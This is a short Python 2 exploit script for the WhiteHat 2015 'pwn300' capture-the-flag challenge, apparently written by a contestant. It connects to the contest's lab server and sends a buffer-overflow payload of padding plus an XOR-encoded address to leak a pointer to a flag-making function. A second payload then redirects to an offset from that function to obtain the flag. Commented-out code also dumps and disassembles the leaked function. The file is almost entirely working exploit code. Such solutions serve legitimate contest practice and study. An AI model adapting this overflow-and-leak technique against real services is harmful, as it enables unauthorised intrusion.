Whitehat_2015_pwn300.py

#!/usr/bin/python
# Author : peternguyen

from Pwn import *
import time
from capstone import *

p = Pwn(host='lab8.grandprix.whitehatvn.com',port=1337)

def xor(msg):
	data = ''
	for c in msg:
		data += chr(ord(c) ^ 0xc3)
	return data

def exploit():
	p.connect()
	p.read_until('Welcome to exhor server\n')
	l = 256 + 0xc + 8
	i = 0
	# raw_input('Debug>')	
	p.send('A'*l + p.pack(0x0804A01C ^ 0xc3c3c3c3) + '\x00\n')
	data = p.recv(1024)
	make_flag = p.unpack(data[l + 4:l + 8])
	tmp = make_flag
	p.send('A'*l + p.pack((make_flag + 7156) ^ 0xc3c3c3c3) + '\x00\n')
	data = p.recv(1024)
	print repr(data)
	# print repr(data)
	# make_flag_func = ''
	# while 1:
	# 	print hex(make_flag)
	# 	p.send('A'*l + p.pack(make_flag ^ 0xc3c3c3c3) + '\x00\n')
	# 	data = p.recv(1024)
	# 	leak = data[l+4:-1]
	# 	if len(leak) == 0:
	# 		make_flag_func += '\x00'
	# 		make_flag += 1
	# 	else:
	# 		make_flag_func += leak
	# 		make_flag += len(make_flag_func)
	# 	print repr(make_flag_func)
	# 	if '\x00'*10 in make_flag_func:
	# 		break
	# md = Cs(CS_ARCH_X86, CS_MODE_32)
	# for i in md.disasm(make_flag_func, tmp):
	# 	print("0x%x:\t%s\t%s" %(i.address, i.mnemonic, i.op_str))
		# time.sleep(1)
	# p.io()

exploit()